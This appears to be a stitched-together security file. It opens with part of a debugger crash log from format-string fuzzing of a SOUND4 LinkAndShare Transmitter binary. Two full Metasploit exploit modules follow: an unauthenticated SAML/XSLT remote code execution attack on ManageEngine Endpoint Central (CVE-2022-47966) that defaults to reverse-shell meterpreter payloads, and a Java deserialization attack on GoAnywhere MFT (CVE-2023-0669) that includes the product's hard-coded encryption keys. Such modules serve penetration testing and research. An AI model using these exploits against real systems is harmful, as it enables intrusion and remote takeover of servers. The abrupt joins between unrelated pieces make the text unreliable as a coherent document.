/>cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br />0:000> u 645046b1<br />MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132]:<br />645046b1 cd29 int 29h<br />645046b3 56 push esi<br />645046b4 6a01 push 1<br />645046b6 be170400c0 mov esi,0C0000417h<br />645046bb 56 push esi<br />645046bc 6a02 push 2<br />645046be e85efeffff call MSVCR120!_call_reportfault (64504521)<br />645046c3 56 push esi<br />0:000> u 64477785<br />MSVCR120!getenv [f:\dd\vctools\crt\crtw32\misc\getenv.c @ 75]:<br />64477785 6a0c push 0Ch<br />64477787 68f0774764 push offset MSVCR120!_CT??_R0?AVbad_caststd+0x66c (644777f0)<br />6447778c e8ea75ffff call MSVCR120!__SEH_prolog4 (6446ed7b)<br />64477791 8365e400 and dword ptr [ebp-1Ch],0<br />64477795 33c0 xor eax,eax<br />64477797 8b7508 mov esi,dword ptr [ebp+8]<br />6447779a 85f6 test esi,esi<br />6447779c 0f95c0 setne al<br />0:000> g<br />WARNING: Continuing a non-continuable exception<br />(4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! 
second chance !!!)<br />eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000<br />eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />MSVCR120!_invoke_watson+0xe:<br />645046b1 cd29 int 29h<br /><br /><br />---<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA<br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file<br />02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b.<br />.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA<br /></code></pre>
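# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# Unauthenticated RCE against ManageEngine Endpoint Central / MSP
# (CVE-2022-47966). A crafted SAMLResponse carries an XSLT transform inside
# the signature's <ds:Transforms>; the outdated Apache Santuario on the target
# evaluates that stylesheet, which calls java.lang.Runtime#exec. Random bytes
# are used for the digest and signature values, so (per the references) the
# transform must run before any signature check would reject the message.
# Only targets with SAML-based SSO configured expose the vulnerable path.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options. TARGETURI is the SAML response servlet.
  # DELAY spaces out the CmdStager requests because the server enforces a
  # per-page access limit (see execute_command).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine Endpoint Central Unauthenticated SAML RCE',
        'Description' => %q{
          This exploits an unauthenticated remote code execution vulnerability
          that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10
          and below (CVE-2022-47966). Due to a dependency to an outdated library
          (Apache Santuario version 1.4.1), it is possible to execute arbitrary
          code by providing a crafted `samlResponse` XML to the Endpoint Central
          SAML endpoint. Note that the target is only vulnerable if it is
          configured with SAML-based SSO , and the service should be active.
        },
        'Author' => [
          'Khoa Dinh', # Original research
          'horizon3ai', # PoC
          'Christophe De La Fuente', # Based on the original code of the ServiceDesk Plus Metasploit module
          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Added some small tweaks to the original code of Christophe to make it work for this target
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-47966'],
          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
        ],
        'Platform' => [ 'win' ],
        'Payload' => {
          # The command ends up inside a single-quoted XPath string literal
          # (see the XSLT in execute_command), so a single quote would break out of it.
          'BadChars' => "\x27"
        },
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :windows_command,
              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 8443,
          'SSL' => true
        },
        'DefaultTarget' => 1,
        'DisclosureDate' => '2023-01-10',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true
      )
    )

    register_options([
      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
    ])
  end

  # Probes /SamlRequestServlet. A target with SAML-based SSO enabled answers
  # with a 302 whose Location header carries a SAMLRequest= parameter.
  #
  # Returns true only in that case. No response, a non-302 status or a reply
  # without a Location header all count as "not enabled" instead of raising.
  def check_saml_enabled
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('/SamlRequestServlet')
    })
    if res.nil?
      print_error('No response from target.')
      return false
    end

    # Location can be absent (e.g. a 200 or 404 reply); .to_s turns nil into ""
    # so the include? test is simply false rather than a NoMethodError.
    res.code == 302 && res.headers['Location'].to_s.include?('SAMLRequest=')
  end

  # There is no version banner to fingerprint, so the only usable signal is
  # whether SAML-based SSO is enabled; without it the exploit path does not exist.
  def check
    return Exploit::CheckCode::Safe unless check_saml_enabled

    CheckCode::Detected('SAML-based SSO is enabled.')
  end

  # CmdStager hook. PowerShell stagers contain '$' characters; they are
  # back-tick escaped here, presumably so PowerShell does not expand them
  # once the stager is embedded in a double-quoted command string — TODO confirm.
  def encode_begin(real_payload, reqs)
    super

    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
    end
  end

  # Dispatches on the selected target: a command payload is sent in a single
  # request, a native payload is dropped via CmdStager (several requests,
  # DELAY seconds apart).
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      execute_cmdstager(delay: datastore['DELAY'])
    end
  end

  # Wraps +cmd+ in a SAMLResponse whose signature Reference carries an XSLT
  # transform invoking java.lang.Runtime#exec, POSTs it to TARGETURI and
  # returns the HTTP response.
  #
  # The command is XML-attribute-escaped because it lands inside a select=""
  # attribute; String#encode(xml: :attr) also wraps the result in double
  # quotes, which are stripped again. Single quotes are excluded via BadChars
  # since the command sits inside a single-quoted XPath literal.
  #
  # Fails with Unreachable when no response arrives, with NoAccess when the
  # server's per-page access limit is hit (wait and raise DELAY), and with
  # Unknown for any other non-200 reply (the body is written to the log).
  def execute_command(cmd, _opts = {})
    cmd = "cmd /c #{cmd}" if target['Type'] == :windows_dropper
    cmd = cmd.encode(xml: :attr).gsub('"', '')

    assertion_id = "_#{SecureRandom.uuid}"
    # Three distinct random XSL variable names; the Set guarantees uniqueness.
    vars = Set.new
    vars << Rex::Text.rand_text_alpha_lower(5..8) while vars.size < 3
    vars = vars.to_a
    saml = <<~EOS
      <?xml version="1.0" encoding="UTF-8"?>
      <samlp:Response
        ID="_#{SecureRandom.uuid}"
        InResponseTo="_#{Rex::Text.rand_text_hex(32)}"
        IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
        <samlp:Status>
          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
        </samlp:Status>
        <Assertion ID="#{assertion_id}"
          IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
              <ds:Reference URI="##{assertion_id}">
                <ds:Transforms>
                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
                    <xsl:stylesheet version="1.0"
                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
                      <xsl:template match="/">
                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
                        <xsl:value-of select="$#{vars[2]}"/>
                      </xsl:template>
                    </xsl:stylesheet>
                  </ds:Transform>
                </ds:Transforms>
                <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
                <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
              </ds:Reference>
            </ds:SignedInfo>
            <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue>
            <ds:KeyInfo/>
          </ds:Signature>
        </Assertion>
      </samlp:Response>
    EOS

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI']),
      'vars_post' => {
        'SAMLResponse' => Rex::Text.encode_base64(saml)
      }
    })

    # Previously a nil response fell through to res.get_html_document and
    # raised NoMethodError instead of a proper failure.
    fail_with(Failure::Unreachable, 'No response received from the target.') if res.nil?

    unless res.code == 200
      lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
      if lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
        fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')
      end
      elog("Unknown error returned:\n#{lines.join("\n")}")
      fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res.code}). See logs for details.")
    end

    res
  end

end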
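##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Pre-auth RCE against Fortra GoAnywhere MFT (CVE-2023-0669). The licence
# endpoint decrypts the POSTed 'bundle' parameter with a key and IV that are
# fixed per product generation (the two targets below) and then deserialises
# the plaintext as a Java object, so a CommonsBeanutils1 gadget chain runs
# the payload during deserialisation.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::JavaDeserialization

  # Module metadata and options. Each target only differs in the hard-coded
  # key and in the version suffix appended to the encrypted blob.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Fortra GoAnywhere MFT Unsafe Deserialization RCE',
        'Description' => %q{
          This module exploits CVE-2023-0669, which is an object deserialization
          vulnerability in Fortra GoAnywhere MFT.
        },
        'Author' => [
          'Ron Bowes', # Analysis and module
        ],
        'References' => [
          ['CVE', '2023-0669'],
          ['URL', 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'],
        ],
        'DisclosureDate' => '2023-02-01',
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'win'],
        'Arch' => [ARCH_CMD],
        'Privileged' => false,
        'Targets' => [
          [
            'Version 2 Encryption',
            {
              'DefaultOptions' => {
                'Version' => '$2',
                'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',
                'EncryptionIv' => '4145532f4342432f504b435335506164'
              }
            },
          ],
          [
            'Version 1 Encryption',
            {
              'DefaultOptions' => {
                'Version' => '',
                'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',
                'EncryptionIv' => '4145532f4342432f504b435335506164'
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8001,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Unsafe deserialization endpoint', '/goanywhere/lic/accept']),
    ])

    # \A / \z anchor the whole value; ^ / $ are per-line in Ruby and would let
    # a multi-line string through as long as its first line looked like hex.
    register_advanced_options([
      OptString.new('Version', [false, 'A version value to append to the encrypted data']),
      OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /\A(?:[a-fA-F0-9]{2})+\z/),
      OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /\A(?:[a-fA-F0-9]{2})+\z/),
      OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])
    ])
  end

  # Builds the cipher (encrypt mode) used to wrap the serialised object.
  #
  # Validates that EncryptionAlgorithm is known to OpenSSL and that the
  # hex-decoded key and IV have exactly the lengths that algorithm requires;
  # every bad option is reported together via Msf::OptionValidateError.
  #
  # Returns a keyed, IV-initialised OpenSSL::Cipher.
  def build_cipher
    algorithm = datastore['EncryptionAlgorithm']
    unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(algorithm) }
      raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })
    end

    cipher = OpenSSL::Cipher.new(algorithm)
    cipher.encrypt

    # The option regexes guarantee an even count of hex digits, so pack('H*')
    # is a lossless decode (same bytes as the former per-pair .hex.chr loop).
    iv = [datastore['EncryptionIv']].pack('H*')
    key = [datastore['EncryptionKey']].pack('H*')

    option_errors = {}
    unless cipher.iv_len == iv.length
      option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."
    end
    unless cipher.key_len == key.length
      option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."
    end
    raise Msf::OptionValidateError, option_errors unless option_errors.empty?

    cipher.iv = iv
    cipher.key = key
    cipher
  end

  # Serialises the payload into a CommonsBeanutils1 gadget chain, encrypts it
  # with the configured key/IV and POSTs it as the 'bundle' parameter.
  #
  # HTTP 500 is treated as success — presumably the gadget chain has already
  # run by the time the server's deserialisation fails — and any other status
  # is reported as an unexpected reply.
  def exploit
    vprint_status('Generating a serialized Java object with the payload')
    obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)

    vprint_status('Encrypting the payload')
    cipher = build_cipher
    obj = cipher.update(obj) + cipher.final

    vprint_status('Sending request to the server')
    # The Version suffix ('$2' for the newer key) is appended verbatim after
    # the URL-safe base64 blob; it is not part of the encrypted data.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI']),
      'vars_post' => {
        'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"
      }
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
    if res.code != 500
      fail_with(Failure::UnexpectedReply, "Expected the server to return HTTP/500, instead received HTTP/#{res.code}")
    end
  end
end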